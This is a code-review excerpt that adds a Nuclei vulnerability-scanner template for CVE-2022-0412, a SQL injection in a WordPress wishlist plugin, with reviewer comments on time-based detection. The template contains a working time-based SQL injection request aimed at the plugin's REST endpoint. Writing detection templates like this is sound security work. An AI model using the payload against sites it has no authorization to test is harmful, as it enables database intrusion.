nuclei/CVE-2022-0412.yaml

```diff
@@ -0,0 +1,56 @@
+id: CVE-2022-0412
+
+info:
+  name: WordPress TI WooCommerce Wishlist <1.40.1 - SQL Injection
+  author: edoardottt
+  severity: critical
+  description: |
+    WordPress TI WooCommerce Wishlist plugin before 1.40.1 contains a SQL injection vulnerability. The plugin does not sanitize and escape the item_id parameter before using it in a SQL statement via the wishlist/remove_product REST endpoint.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database.
+  remediation: |
+    Update to the latest version of the TI WooCommerce Wishlist plugin (1.40.1 or higher).
+  reference:
+    - https://wpscan.com/vulnerability/e984ba11-abeb-4ed4-9dad-0bfd539a9682
+    - https://wordpress.org/plugins/ti-woocommerce-wishlist/advanced/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0412
+    - https://plugins.trac.wordpress.org/changeset/2668899
+    - https://github.com/ARPSyndicate/cvemon
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-0412
+    cwe-id: CWE-89
+    epss-score: 0.10259
+    epss-percentile: 0.94816
+    cpe: cpe:2.3:a:templateinvaders:ti_woocommerce_wishlist:*:*:*:*:*:wordpress:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: templateinvaders
+    product: ti_woocommerce_wishlist
+    framework: wordpress
+  tags: cve2022,cve,sqli,ti-woocommerce-wishlist,wpscan,woocommerce,wordpress,wp-plugin,wp,templateinvaders
+
+http:
+  - raw:
+      - |
+        @timeout: 15s
+        GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1
```

Comment:
I really don't like time based detection. Can we do better?

Reply:
In this case it's time based `AND` response content check, the non-vulnerable instances return `Invalid Item ID` instead of `Product not found`.

Reply:
OK, hopefully won't be too false positive.